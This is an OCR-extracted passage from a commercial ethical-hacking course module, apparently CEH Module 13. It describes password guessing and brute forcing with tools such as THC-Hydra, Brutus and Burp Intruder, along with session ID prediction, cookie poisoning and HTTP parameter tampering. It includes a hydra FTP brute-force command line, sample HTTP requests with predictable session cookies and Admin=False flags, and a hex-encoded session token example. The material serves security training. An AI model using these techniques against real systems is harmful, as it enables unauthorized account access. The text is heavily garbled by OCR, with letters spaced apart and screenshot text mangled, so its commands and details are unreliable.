echanism s Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. P a s s w o r d A t t a c k s : P a s s w o r d F u n c t i o n a l i t y E x p l o i t s P assw ord a tta c k s a re th e te c h n iq u e s used by th e a tta c k e r fo r d is c o v e rin g p assw ord s. A tta c k e rs e x p lo it th e p a ssw o rd fu n c tio n a lity so th a t th e y can bypass th e a u th e n tic a tio n m e c h a n is m. P a s s w o r d C h a n g i n g D e te rm in e p a ssw o rd ch ange fu n c tio n a lity w ith in th e a p p lic a tio n by s p id e rin g th e a p p lic a tio n o r c re a tin g a lo g in a c c o u n t. T ry ra n d o m strin g s fo r O ld P assw ord, N ew P assw ord, and C o n firm th e N e w P assw ord fie ld s and a nalyze e rro rs to id e n tify v u ln e ra b ilitie s in p a ssw o rd change fu n c tio n a lity. P a s s w o r d R e c o v e r y F o rg o t P assw ord fe a tu re s g e n e ra lly p re s e n t a c h a lle n g e to th e user; if th e n u m b e r o f -י ^ a tte m p ts is n o t lim ite d, a tta c k e rs can guess th e ch a lle n g e a n s w e r su cce ssfu lly w ith th e h e lp o f social e n g in e e rin g. A p p lic a tio n s m ay also send a u n iq u e re c o v e ry URL o r e x is tin g p a ssw o rd to an e m a il a ddre ss sp e cifie d by th e a tta c k e r if th e ch a lle n g e is so lve d. R e m e m b e r M e E x p l o i t R e m e m b e r M e fu n c tio n s a re im p le m e n te d usin g a sim p le p e rs is te n t c o o kie, such as R e m e m b e ru se r= ja so n o r a p e rs is te n t session id e n tifie r such as R e m e m b e ru ser= A B Y M odule 13 Page 1860

139 A tta c k e rs can use an e n u m e ra te d u ser n a m e o r p re d ic t th e session id e n tifie r to bypass a u th e n tic a tio n m e ch a n ism s. M odule 13 Page 1861

140 Password Attacks: Password Guessing Password List Attackers create a list o f possible passwords using m ost com m only used passwords, fo o tp rin tin g target and social engineeringtechniques, and try each password u n til the correct password is discovered re A tta ckers can cre a te a d ic tio n a ry Password D ictionary o f all possible passw ords using to o ls such as D ic tio n a ry M a k e r to p e rfo rm d ic tio n a ry a tta cks Tools Passw ord guessing can be p e rfo rm e d m a n u a lly o r using a u to m a te d to o ls such as B rutu s, TH C -Hydra,etc. CEH %!0 u it Target Pa3swcrdc Tuning Cpeciffc Gtart j *lout Ta1g«l Passwcrts Tun.ng 0pecific Gtart Username ( Username C Usomamo Lict C Password <* Passv/ora List Color separated rile r Leo Colon 6eporatod filo test! O u to jt H ydra v4 * (c) 5004 by v a n M a u ser/t H C u s e allo A/Pd only for legal p u rp o ses H yd a (tvto. vw.ua Ihc erg) starling at :58:52 [D A ' AJ 3 2 ta s k s. 1 se rv e rs, login tries (l:1/p:45380). ~1418 trie s p e rta s k [ d a t a ] a r a c k n g serv ice ftp on port 21 (STATUS] Ules/min Irles In00:01h lexfoIn00:031) [STATUS] ifles/min tries In00: tcxioIn [2 ו ][Tip] h o s t: lo g : m a rc p a s s w o rd : s u c c e s s Hyda (Mp.//*#swlhc erg) finisheda! :01:38 < r1nlshed> P" Try login as password [7 T ry empty passw ac; Gave Output I hydra ftp -I testuser -P /tmp/pa3slist.1xt -e ns Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. - P a s s w o r d A t t a c k s : P a s s w o r d G u e s s i n g J 1 = S - P assw ord g uessin g is a m e th o d w h e re an a tta c k e r guesses v a rio u s p a ssw o rd s u n til he o r she gets th e c o rre c t p a ssw o rd s by using th e fo llo w in g m e th o d s : p a ssw o rd list, p a ssw o rd d ic tio n a ry, and v a rio u s to o ls. A tta c k e rs c re a te a list o f p ossib le p a ssw o rd s usin g m o s t c o m m o n ly used p a ssw o rd s, fo o tp r in tin g ta rg e t and social e n g in e e rin g te c h n iq u e s, and try in g each p a ssw o rd u n til th e c o rre c t p a ssw o rd is d is c o v e re d. P a s s w o r d D i c t i o n a r y m A tta c k e rs can c re a te a d ic tio n a ry o f all p ossib le p a ssw o rd s usin g to o ls such as D ic tio n a ry M a k e r to p e rfo rm d ic tio n a ry a tta cks. T o o l s U s e d f o r P a s s w o r d G u e s s i n g P assw ord guessin g can be p e rfo rm e d m a n u a lly o r using a u to m a te d to o ls such as W e b C ra cke r, B ru tu s, B u rp In sid e r, TH C -H ydra, etc. T H C - H y d r a S ource: h ttp ://w w w.th c.o r g M odule 13 Page 1862

141 THC-HYDRA is a n e tw o rk lo g o n c ra c k e r th a t s u p p o rts m a n y d iffe r e n t services. This to o l is a p ro o f o f c o n c e p t co de, to give re se a rchers and s e c u rity c o n s u lta n ts th e p o s s ib ility to s h o w h o w easy it w o u ld be to gain u n a u th o riz e d re m o te access to a syste m. III III 1 1 <0 Q u it ן T a rg e t P a s s w o rd s T u n in g S p e c ific S tart T a rg e t P a s s w o rd s T u n in g S p e c ific S ta rt! IfIh H y d ra G T K [h י U s e rn a m e ( U s e rn a m e C U s e rn a m e L is t p a s sw ora C P a s s w o rd < P a ssw ord L is t C d o n s e p e ra te d file te s tu s e t /tm p /p a s s lis t.tx t O u tp u t H y d ra v 4 1 (c) by v a n H a u s e r / T H C u s e a llo w e d o n ly fo r le g a l p u rp o s e s. H y d ra ( h t t p /. w w w.th c o rg ) s ta rtin g at * ;5 8 :5 2 [D A T A ] 3 2 ta s k s. 1 s e rv e rs lo g in trie s (l:1 /p : ). ~ trie s p e r ta s k [D A T A ] a tta c k in g s e r v ic e ftp on p o rt 21 [S T A T U S ] tn e s 'm in, t rie s in 0 0 :0 1 h to d o in 0 0 :0 3 h [S T A T U S ] tn e s ^ m in trie s in 0 0 :0 2 h to d o in 0 0 :0 2 h [21 ][T ip ] h o s t: lo g in : m a r c p a s s w o r d : s u c c e s s H y d ra ( h ltp /.,w w w.th c o rg ) fin is h e d a t : < fln is h e d > U s e C o lo n se p e ra te d file (7 T ry log in a s p a s s w o rd F T ry e m p ty pa ssw o rd S f a r lj S t o p j r.ove O u tp u t C le a r O u tp u t fiy d r a ftp 1 te s tu s e r P /tm p /p a s s lis t.tx t e ns ^ 1y d ra ftp 1 m arc -P /tm p /p a s s lis t.tx t e ns -t 3 2 F I G U R E : T H C - H y d r a T o o l S c r e e n s h o t In a d d itio n to th e s e to o ls, B u rp In s id e r is also used fo r p a ssw o rd guessing. M odule 13 Page 1863

142 Password Attacks: Brute-forcing I CEH C o p y r ig h t by E&Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. P a s s w o r d A t t a c k s : B r u t e F o r c i n g wcav 1 1 B rute fo rce is one o f th e m e th o d s used fo r cracking passw ords. In a b ru te fo rcin g attack, attackers crack th e login passw ords by try in g all possible values fro m a set o f alphabe t, num eric, and special characters. The m a in lim ita tio n o f th e b ru te fo rc e a tta c k is this is beneficial in id e n tify in g small passw ords o f tw o characters. Guessing becom es m o re crucial w h e n th e passw ord length is long er and also if it contains le tte rs w ith b o th u p p e r and lo w e r case. If n u m b e rs and sym bols are used, th e n it m ig h t even take m o re th a n a fe w years to guess th e passw ord, w h ich is a lm o st practically im possible. C o m m o n ly used passw ord cracking too ls by a ttackers include Burp Suite's In tru d e r, Brutus, Sensepost's C row bar, etc. B u r p S u i t e ' s I n t r u d e r > Source: h ttp ://p o rts w ig g e r.n e t Burp In tru d e r is a m o d u le o f BurpSuite. It enables th e user to a u to m a tize pen te stin g on w e b applications. M odule 13 Page 1864

143 ourp intruder repeater window about burp suite free e d itio n v intruder \ repeater [ sequencer f decoder [ comparer ' options \ alerts spider s c a n n e r target positions j payloads ' options numder of payloads: number of requests payload set 1 brute forcer character set [at)cdefghijklmnopqtstuvwxy j max length p a y lo a d p r o c e s s i n g r u l e s to uppercase F I G U R E : B u r p S u i t e ' s I n t r u d e r T o o l S c r e e n s h o t B r u t u s Source: h ttp ://w w w.h o o b ie.n e t B rutus is a re m o te passw ord cracking to o l. B rutus su p p o rts HTTP, POP3, FTP, SMB, Telnet, IM AP, NNTP, and m a n y o th e r a u th e n tic a tio n types. It includes a m ulti-sta g e a u th e n tic a tio n engine and can m ake 60 sim u lta n e o u s ta rg e t connections. B r u t u s - A E T 2 - w w w. h o o b i e. n e t / b r u t u s - ( J a n u a r y ) < F ile T o o ls H e lp Targe( Connection Options Pott Connections Tjpe HTTP (Basic Auth) J Start Slep Cleat 10 Timeout r J 10 I- Use Proxy Deline HTTP (Basic) Options Method HEAD ^ P KeepAive Authentication Options 7 Use Username f~ Single Use! Pass Mode w otd List Usei File users, txlj Browse Pass Fie w 1ds.txt Biowse Positive Authentication Results Target / V 1?7nn v Opened user fie containing 6 users. Opened password lile containing 818 Passwords Maximum nurnhpr nf flulhenlicrtfinn alfpmnts wil he 4908 HTTP (Basic Auth) H T T P (B asic Auth) H T T P IR n s ir A ij l h l Username admin backup a rlm in Password academic Timeout Reject Auth Sea Throttle Quick Kill FIGURE : B ru tu s T o o l S c r e e n s h o t M odule 13 Page 1865

144 C o p y r ig h t b y EC-Couactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. S e s s i o n A t t a c k s : S e s s i o n I D P r e d i c t i o n / B r u t e F o r c i n g Every tim e a user logs in to a p a rtic u la r w e b s ite, th e n a session ID is g ive n to th e user. This session ID is v a lid u n til th e session is te rm in a te d and a n e w session ID is p ro v id e d w h e n th e user logs in again. A tta c k e rs tr y to e x p lo it th is se ssio n ID m e c h a n is m by guessing th e n e x t session ID a fte r c o lle c tin g so m e va lid session IDs. 0 In th e fir s t ste p, th e a tta c k e r c o lle c ts so m e va lid session ID va lu e s by s n iffin g tr a ffic fro m a u th e n tic a te d users. A tta c k e rs th e n a nalyze c a p tu re d session IDs to d e te rm in e th e session ID g e n e ra tio n process such as th e s tru c tu re o f session ID, th e in fo rm a tio n th a t is used to c re a te it, and th e e n c ry p tio n o r hash a lg o rith m used b y th e a p p lic a tio n to p ro te c t it. In a d d itio n, th e a tta c k e r can im p le m e n t a b ru te fo rc e te c h n iq u e to g e n e ra te and te s t d iffe r e n t va lu e s o f th e session ID u n til he o r she successfu lly g e ts access to th e a p p lic a tio n. M odule 13 Page 1866

145 V u ln e ra b le session g e n e ra tio n m e ch a n ism s th a t use session IDs co m p o s e d by user n am e o r o th e r p re d ic ta b le in fo rm a tio n, like tim e s ta m p o r c lie n t IP a ddre ss, can be e x p lo ite d by easily guessing v a lid session IDs. GET menu=410http/1.1 H o s t:ja n a in a : U ser*a gent: M o z illa /5.0 (W in d o w ; U; W in d o w s NT 5.2 ; e n * U S ;rv : ) G ec k o / F ire fo x / R e q u e s t A c c e p t:te x t/x m l,a p p llc a tlo n /x m l,a p p llc a tlo n /x h tm k * m l,te x t/h tm d ;q - 0.9,te x t/p la in ;q = 0.8,lm a g e /p n g,v,',q = 0.5 R e fe re r: h ttp : //la n a in a : /W eb G o a t/attac k?s cre en = 1 7 & m en u = י C o o k ie; JS ESSIO N ID =user01 A u th o riz a tio n : B asic23v ic3q 623V lc3q Predictable Session Cookie F I G U R E : S e s s i o n I D P r e d i c t i o n / B r u t e F o r c i n g For c e rta in w e b a p p lic a tio n s, th e session ID in fo rm a tio n is u sually co m p o s e d o f a s trin g o f fix e d w id th. R andom ness is e ssentia l in o rd e r to a void p re d ic tio n. From th e d ia g ra m yo u can see th a t th e session ID v a ria b le is in d ic a te d by JSESSIONID and a ssum in g its va lu e as "u s e ro l," w h ic h c o rre s p o n d s to th e user n a m e. By guessin g th e n e w va lu e fo r it, say as "u s e r 0 2," it is p ossible fo r th e a tta c k e r to gain u n a u th o riz e d access to th e a p p lic a tio n. M odule 13 Page 1867

146 Cookie Exploitation: Cookie Poisoning I f th e c o o k ie c o n ta in s p a s s w o rd s o r s e s s io n id e n tifie r s, a tta c k e rs can s te a l th e c o o k ie u s in g te c h n iq u e s su ch as s c r ip t in je c tio n a n d e a v e s d ro p p in g A tta c k e rs th e n re p la y th e c o o k ie w ith th e s a m e o r a lte re d p a s s w o rd s o r se s s io n id e n tifie rs to b y p a s s w e b a p p lic a tio n a u th e n tic a tio n A ttackers can tra p cookies using tools such as OW ASP Zed A tta c k Proxy, B urp S u ite, etc. dfj 13 Q1? 1, <2> ile Edit View Analyse Report Tools Hole Requests j Response Brga«.Xj ' J M J U j U B i H i - * " 1*1 C Untifled Session - OWASP ZAP itt *_.: ו ו _ M cxilw S.C *.יISiadc t t.2 ; EHK«4t Appl«V ebk it/537.4 (KETKL I lk Scckol Cfcr0K*/ ».9 4 S«C«X1 / Cache-C onti0 1: oax-aoe=0 A ccept! / Rererer: ntcr://in.yonoc.oca»/?p^;3 A eeept-e nccding: a deft A ccept-l an^uiqv: cn-u S,«n;q^>.9 A cc v p t-c h a sav t: XSO -S559-1.at -S;<f-C. 7, jq C ookl : a<uld015s24s9e12sar4e: «< u r-:3 S 4 «U ~ C m 3: Hoats ti.a d ls ie z a x.c o a it 19: 1 History aruekxe ].! 1 Seatdi ^ Alerts ran > j spioer j*f*. Current Scans 0 URI found during aa*m URi found bui oul of aart scope Alerts r»00 - p o f»0 h ttp s://w w w.ow a sp.org cunwscam_* 0 *0 0 wo C o p y r ig h t b y EC-Gauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n Is S t r ic t ly P r o h ib ite d C o o k i e E x p l o i t a t i o n : C o o k i e P o i s o n i n g C ookies fre q u e n tly tra n s m it s e n s itiv e c re d e n tia ls and can be m o d ifie d w ith ease to e scala te access o r assum e th e id e n tity o f a n o th e r user. C ookies are used to m a in ta in a session s ta te in th e o th e rw is e sta te le ss HTTP p ro to c o l. Sessions are in te n d e d to be u n iq u e ly tie d to th e in d iv id u a l accessing th e w e b a p p lic a tio n. P o isonin g o f co o kie s and session in fo rm a tio n can a llo w an a tta c k e r to in je c t m a lic io u s c o n te n t o r o th e rw is e m o d ify th e u ser's o n lin e e x p e rie n c e and o b ta in u n a u th o riz e d in fo rm a tio n. C ookies can c o n ta in se ssio n -sp e cific d a ta such as user IDs, p a ssw o rd s, a c c o u n t n u m b e rs, links to s h o p p in g c a rt c o n te n ts, s u p p lie d p riv a te in fo rm a tio n, and session IDs. C ookies e xist as file s s to re d in th e c lie n t c o m p u te r's m e m o ry o r hard disk. By m o d ify in g th e d a ta in th e c o o k ie, an a tta c k e r can o fte n gain e scala te d access o r m a lic io u s ly a ffe c t th e u ser's session. M a n y sites o ffe r th e a b ility to "R e m e m b e r m e? " and s to re th e u ser's in fo rm a tio n in a c o o k ie, so he o r she d oes n o t have to re -e n te r th e d a ta w ith e v e ry v is it to th e site. A n y p riv a te in fo rm a tio n e n te re d is s to re d in a c o o kie. In an a tte m p t to p ro te c t co o kie s, site d e v e lo p e rs o fte n e n c o d e th e co o kie s. Easily re v e rs ib le e n c o d in g m e th o d s such as Base64 and ROT13 (ro ta tin g th e le tte rs o f th e a lp h a b e t 13 ch a ra c te rs ) give m a n y w h o v ie w co o kie s a fa lse sense o f s e c u rity. If th e co o kie c o n ta in s p a ssw o rd s o r session id e n tifie rs, a tta c k e rs can steal th e co o kie using te c h n iq u e s such as s c rip t in je c tio n and e a v e s d ro p p in g. A tta c k e rs th e n re p la y th e co o kie w ith th e sam e o r a lte re d M odule 13 Page 1868

147 p a ssw o rd s o r session id e n tifie rs to bypass w e b a p p lic a tio n a u th e n tic a tio n. E xam ples o f to o ls used by th e a tta c k e r fo r tra p p in g co o kie s in c lu d e O W ASP Zed A tta c k P ro xy, B u rp S u ite, e tc. O W ASP Zed A tta c k P ro xy י] [ S ource: h ttp s ://w w w.o w a s p.o rg O W ASP Zed A tta c k P ro xy P ro je c t (ZAP) is an in te g ra te d p e n e tra tio n te s tin g to o l fo r te s tin g w e b a p p lic a tio n s. It p ro v id e s a u to m a te d sca nners as w e ll as a se t o f to o ls th a t a llo w yo u to fin d s e c u rity v u ln e ra b ilitie s m a n u a lly. O U n t i t l e d S e s s io n - O W A S P Z A P _ 1 ם _ 1 x 1 ile E d it v ie w A n a ly s e R e p o rt T o o ls H e lp 1 1 J t d H r i s s i O Q v Q v -*0 b 0 f S ite s ( *! f R e q u e s t1- * j R e s p o n s e j B re a k > C ]» f= h ttp //tr a d in te» y tr U y a h o o _ H e a d e r: T e xt * j B o dy: T e xt T U s e r - A g e n t : M o z i l l a / 5. 0 ( W in d o w s N T 6. 2 ; W O W 64) A p p l e W e b K i t / ( K H T M L, 4 l l l c e G e c k o ) C h r o m e / S a f a r l / S C a c h e - C o n t r o l : m a x - a g e _ 0 k A c c e p t : * / * R e f e r e r : h t t p : / / i n. y a h o o. c o m /? p u s A c c e p t - E n c o d i n g : s d c h A c c e p t - L a n g u a g e : e n - O S, e n ; q 0.8 * 3-0. q l, u t f - 8 ; q , * ; A c c e p t - C h a r s e t : 1 s s 9 C o o k i e : a d x i d S a f 4 6 ; a d x f e H o s t : t r. a d i n t e r a x. c o m * H is to ry S e arch \ B re a k P o in ts \ A le rts A ctive S c a n J ^ S p i d e r ^ : J B rute F o rc e - [ P o rt S c a n ] F uzze r ] P a ra m s [ 3 J O u tpu t Site : tr a d in te ra x c o m :8 0 T [> I I C u rre n t S c a n s :0? URI found during crawl: U R I fo u n d but o u t o f c raw l scop e : A le rts 1 ^ 0 0 C u rre n t S c a n s F i g u r e : O W A S P Z e d A t t a c k P r o x y T o o l S c r e e n s h o t M odule 13 Page 1869

148 Attack Web Servers Attack Authentication Mechanism Attack Session Attack Attack Management Data Connectivity Web Services Mechanism C o p y r ig h t b y EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. י 1 - W e b A p p H a c k i n g M e t h o d o l o g y A u th o riz a tio n p ro te c ts th e w e b a p p lic a tio n s by g ivin g a u th o r ity to c e rta in users fo r accessing th e a p p lic a tio n s and re s tric tin g c e rta in users fro m accessing such a p p lic a tio n s. A tta c k e rs by m eans o f a u th o riz a tio n a tta c k s tr y to g ain access to th e in fo rm a tio n re so u rces w ith o u t p ro p e r c re d e n tia ls. The w a ys to a tta c k a u th o riz a tio n s ch e m e s a re e x p la in e d on th e fo llo w in g slides. M odule 13 Page 1870

149 Authorization Attack CEH C«rt1fW4 itfciul Nm Im ^ A tta c k e rs m a n ip u la te th e HTTP re q u e s ts to s u b v e rt th e a p p lic a tio n a u th o riz a tio n sch e m e s b y m o d ify in g in p u t fie ld s th a t relate to user ID, user nam e, access g roup, cost, filenam es, file id entifiers, etc. A tta c k e rs f ir s t access w e b a p p lic a tio n u s in g lo w p riv ile g e d a c c o u n t a n d th e n e s c a la te p riv ile g e s to access p r o te c te d re s o u rc e s Q u e r y S t r i n g H i d d e n T a g s C o p y r ig h t b y EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. A u t h o r i z a t i o n A t t a c k In an a u th o riz a tio n a tta c k, th e a tta c k e r fir s t fin d s th e lo w e s t p riv ile g e d a c c o u n t and th e n logs in as an a u th e n tic user and s lo w ly escalates p riv ile g e s to access p ro te c te d reso urces. A tta c k e rs m a n ip u la te th e HTTP re q u e s ts to s u b v e rt th e a p p lic a tio n a u th o riz a tio n sch e m e s by m o d ify in g in p u t fie ld s th a t re la te to u ser ID, user n a m e, access g ro u p, co st, file n a m e s, file id e n tifie rs, etc. The so urces th a t are used by th e a tta c k e rs in o rd e r to p e rfo rm a u th o riz a tio n a tta c k s in c lu d e u n ifo rm re s o u rc e id e n tifie r, p a ra m e te r ta m p e rin g, POST d a ta, HTTP h e a d e rs, q u e ry s trin g, co o kie s, and h id d e n tags. P a r a m e t e r T a m p e r i n g P a ra m e te r ta m p e rin g is an a tta c k th a t is based on th e m a n ip u la tio n o f p a ra m e te rs th a t are e xchanged b e tw e e n se rv e r and c lie n t in o rd e r to m o d ify th e a p p lic a tio n d ata, such as p rice and q u a n tity o f p ro d u c ts, p e rm is s io n s and u ser c re d e n tia ls, etc. This in fo rm a tio n is u sually s to re d in co o kie s, URL q u e ry strin g s, o r h id d e n fo rm fie ld s, and th a t is used to increase in c o n tro l and a p p lic a tio n fu n c tio n a lity. l E P P o s t D a t a Post d a ta o fte n is c o m p ris e d o f a u th o riz a tio n and session in fo rm a tio n, since in m o s t o f th e a p p lic a tio n s, th e in fo rm a tio n th a t is p ro v id e d by th e c lie n t m u s t be a sso cia te d M odule 13 Page 1871

150 w ith th e session th a t had p ro v id e d it. The a tta c k e r e x p lo itin g v u ln e ra b ilitie s in th e p o s t d a ta can e asily m a n ip u la te th e p o st d a ta and th e in fo rm a tio n in it. M odule 13 Page 1872

151 H T T P R e q u e s t T a m p e r in g CEH Q u e ry S trin g T am p e rin g J I f th e q u e ry s trin g is v is ib le in th e a d d re s s b a r o n th e b ro w s e r, th e a tta c k e r can e a s ily c h a n g e th e s trin g p a ra m e te r to b y p a s s a u th o r iz a tio n m e c h a n is m s h t t p : / / w w w. j u g g y b o y. c o m / m a i l. a s p x? m a i l b o x = j o h n & c o m p a n y = a c m e % 2 0 c o n 1 h t t p s : / / j u g g y s h o p. c o m / b o o k s / d o w n l o a d / p d f h t t p s : / / j u g g y b a n k. c o m / l o g i n / h o m e. j s p? a d m i n = t r u e J A ttackers can use w e b spidering tools such as B u rp S uite to scan th e w e b app fo r POST param eters HTTP H e a d e rs J I f th e a p p lic a tio n uses th e R e fe re r h e a d e r f o r m a k in g access c o n tr o l d e c is io n s, a tta c k e rs can m o d ify it to access p r o te c te d a p p lic a tio n f u n c tio n a litie s GET =»201 HTTP/1.1 Host: janaina:8180 User-Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en-us; rv: ) Gecko/ Firefox/ Accept: text/xml, application/xml, application/xhtml+xml,text/htmtl;g-0.9,text/plain;g=0.8,image/png,*/* g=0.5 Proxy-Connection: keep-alive Referer: http: // juggyboy: 8180/Applications/Download?Admin = False lte m ld = 201 is n o t accessible as A d m in param eter is set to false, attacker can change it to tru e and access protected item s C o p y r ig h t by EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. H T T P R e q u e s t T a m p e r i n g A tta c k e rs ta m p e r w ith th e HTTP re q u e s t w ith o u t using a n o th e r u ser's ID. The a tta c k e r changes th e re q u e s t in b e tw e e n b e fo re th e m essage is re ce ive d by th e in te n d e d re ce ive r. Q u e r y S t r i n g T a m p e r i n g An a tta c k e r ta m p e rs w ith th e q u e ry s trin g w h e n th e w e b a p p lic a tio n s use q u e ry s trin g s to pass on th e m essages b e tw e e n pages. If th e q u e ry s trin g is v is ib le in th e a ddre ss b a r on th e b ro w s e r, th e a tta c k e r can e asily change th e s trin g p a ra m e te r to bypass a u th o riz a tio n m e ch a n ism s. F I G U R E : Q u e r y S t r i n g T a m p e r i n g A tta c k e rs can use w e b s p id e rin g to o ls such as B urp S u ite to scan th e w e b a pp fo r POST p a ra m e te rs. H T T P H e a d e r s If th e a p p lic a tio n uses th e R e fe rre r h e a d e r fo r m a k in g access c o n tro l d e cisio n s, M odule 13 Page 1873

152 a tta c k e rs can m o d ify it to access p ro te c te d a p p lic a tio n fu n c tio n a litie s. GET h ttp ://juggyboy:8180/applications/download?itemid = 201 HTTP/1.1 Host: janaina:8180 U3er Agent: Mozilla/5.0 (Window; U; Windows NT 5.2; en-us; rv: ) Gecko/ Firefox/ Accept: text/xml, application/xml, application/xhtml+xml,tsxt/htm tl;q-0.9,text/plain;q=0.8,image/png,* /*,q=0.5 Proxy-Connection: keep-alive Referer: h ttp ://juggyboy: 8180/Applications/Download?Admin = False F I G U R E : H T T P H e a d e r s Ite m ID = 201 is n o t a ccessible as th e A d m in p a ra m e te r is se t to fa lse; th e a tta c k e r can ch ange it to tru e and access p ro te c te d ite m s. M odule 13 Page 1874

153 I I n t h e f ir s t s te p, th e a tta c k e r c o lle c ts s o m e c o o k ie s s e t b y th e w e b a p p lic a tio n a n d a n a lyze s th e m to d e te rm in e th e c o o k ie g e n e ra tio n m e c h a n is m T h e a tta c k e r th e n tra p s c o o k ie s s e t b y th e w e b a p p lic a tio n, ta m p e rs w ith its p a ra m e te rs using to o ls, such as OW ASP Zed A tta c k P ro x y, and replay to th e application h ttp s://w w w.ow a sp.org C o p y r ig h t b y EC-Gauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. i ן A u t h o r i z a t i o n A t t a c k : C o o k i e P a r a m e t e r T a m p e r i n g y. /. C ookie p a ra m e te r ta m p e rin g is a m e th o d used to ta m p e r w ith th e co o kie s se t by th e w e b a p p lic a tio n in o rd e r to p e rfo rm m a lic io u s a tta cks. In th e fir s t ste p, th e a tta c k e r c o lle c ts so m e co o kie s se t by th e w e b a p p lic a tio n and analyzes th e m to d e te rm in e th e c o o k ie g e n e ra tio n m e c h a n is m. The a tta c k e r th e n tra p s co o kie s se t by th e w e b a p p lic a tio n, ta m p e rs w ith its p a ra m e te rs using to o ls such as Paros Proxy, and re p la ys to th e a p p lic a tio n. S ource: h ttp s ://w w w.o w a s p.o rg M odule 13 Page 1875

154 M odule 13 Page 1876

155 Attack Web Servers Attack Authentication Mechanism Attack Session Attack Attack Management Data Connectivity Web Services Mechanism C o p y r ig h t by EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. W e b A p p H a c k i n g M e t h o d o l o g y A t t a c k S e s s i o n M a n a g e m e n t M e c h a n i s m The session m a n a g e m e n t m e c h a n is m is th e key s e c u rity c o m p o n e n t in m o s t w e b a p p lic a tio n s. Since it plays a key ro le, it has b e co m e a p rim e ta rg e t fo r la u n c h in g m a lic io u s a tta c k s a g a in st a p p lic a tio n session m a n a g e m e n t. A n a tta c k e r b re a k in g th e a p p lic a tio n session m a n a g e m e n t can e asily bypass th e ro b u s t a u th e n tic a tio n c o n tro ls and m a s q u e ra d e as a n o th e r a p p lic a tio n user w ith o u t k n o w in g th e ir c re d e n tia ls (u se r n a m e, p a ssw o rd s). The a tta c k e r can e ven ta k e th e e n tire a p p lic a tio n u n d e r his o r h e r c o n tro l if he o r she c o m p ro m is e s an a d m in is tra tiv e user in th is w ay. The d e ta ils a b o u t th e a tta c k se ssio n m a n a g e m e n t m e ch a n ism are d e scrib e d in d e ta il on th e fo llo w in g slides. M odule 13 Page 1877

156 S ession M a n a g e m e n t A tta c k S e s s i o n M a n a g e m e n t A t t a c k A session m a n a g e m e n t a tta c k is o n e o f th e m e th o d s used by a tta c k e rs to c o m p ro m is e a n e tw o rk. A tta c k e rs b re a k an a p p lic a tio n 's session m a n a g e m e n t m e ch a n ism to bypass th e a u th e n tic a tio n c o n tro ls and im p e rs o n a te a p riv ile g e d a p p lic a tio n user. A session m a n a g e m e n t a tta c k in vo lve s tw o stages; o n e is se ssio n to k e n g e n e ra tio n and th e o th e r is e x p lo itin g session to k e n s h a n d lin g. In o rd e r to g e n e ra te a v a lid session to k e n, th e a tta c k e r p e rfo rm s : 0 Session T oke ns P re d ic tio n Session T oke ns T a m p e rin g O nce th e a tta c k e r g e n e ra te s th e va lid session to k e n, th e a tta c k e r trie s to e x p lo it th e session to k e n h a n d lin g in th e fo llo w in g w ays: 0 Session H ija ckin g Session R eplay Q M a n -ln -T h e -M id d le A tta c k M odule 13 Page 1878

157 Attacking Session Token Generation M echanism EH W e a k E n c o d i n g E x a m p l e h t t p s : / / w w w. j u g g y b o y. c o m / c h e c k o u t? S e s s i o n T o k e n = % 7 5 % 7 3 % 6 5 % 7 2 % 3 D % 6 A % 6 1 % 7 3 % 6 F % 6 E % 3 B % 6 1 % 7 0 % 7 0 % 3 D % 6 1 % 6 4 % 6 D % 6 9 % 6 E % 3 B % 6 4 % 6 1 % 7 4 % 6 5 % 3 D % 3 2 % 3 3 % 2 F % 3 1 % 3 1 % 2 F % 3 2 % 3 0 % 3 1 % 3 0 W hen hex-encoding o f an ASCII string user=jason;app=admin;date=23/ll/201 session token by ju s t changing date and use it fo r an o th e r tra n sa ctio n w ith server S e s s i o n T o k e n P r e d i c t i o n A t t a c k e r s o b t a i n v a l i d s e s s i o n t o k e n s b y s n i f f i n g t h e t r a f f i c o r l e g i t i m a n a l y z i n g i t f o r e n c o d i n g ( h e x - e n c o d i n g, B a s e 6 4 ) o r a n y p a t t e r n a t e l y l o g g i n g i n t o a p p l i c a t i o n a n d I f a n y m e a n i n g c a n b e r e v e r s e e n g i n e e r e d f r o m t h e s a m p l e o f s e s s i o n t o k e n s, a t t a c k e r s a t t e m p t t o g u e s s t h e t o k e n s r e c e n t l y i s s u e d t o o t h e r a p p l i c a t i o n u s e r s A t t a c k e r s t h e n m a k e a l a r g e n u m b e r o f r e q u e s t s w i t h t h e p r e d i c t e d t o k e n s t o a s e s s i o n - d e p e n d e n t p a g e t o d e t e r m i n e a v a l i d s e s s i o n t o k e n C o p y r ig h t b y E&CsiMCtl. A l l R ig h ts R e s e rv e d. R e p r o d u c tio n i s S t r i c t l y P r o h ib ite d. A t t a c k i n g S e s s i o n T o k e n G e n e r a t i o n M e c h a n i s m A tta c k e rs ste al v a lid session to k e n s and th e n p re d ic t th e n e x t session to k e n a fte r o b ta in in g th e va lid session to k e n s. G W e a k E n c o d i n g E x a m p l e h t t p s : //w w w.ju g g y b o y. c o m /c h e c k o u t? SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B% 64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30 W h e n h e x -e n c o d in g o f an ASCII s trin g u s e r = ja s o n ; a p p = a d m in ; d a t e = 2 3 / ll/ 2 0 l0, th e a tta c k e r can p re d ic t a n o th e r session to k e n by ju s t c h a n g in g th e d a te and using it fo r a n o th e r tra n s a c tio n w ith th e se rve r. S e s s i o n T o k e n P r e d i c t i o n A tta c k e rs o b ta in v a lid session to k e n s by s n iffin g th e tr a ffic o r le g itim a te ly lo g g in g in to a p p lic a tio 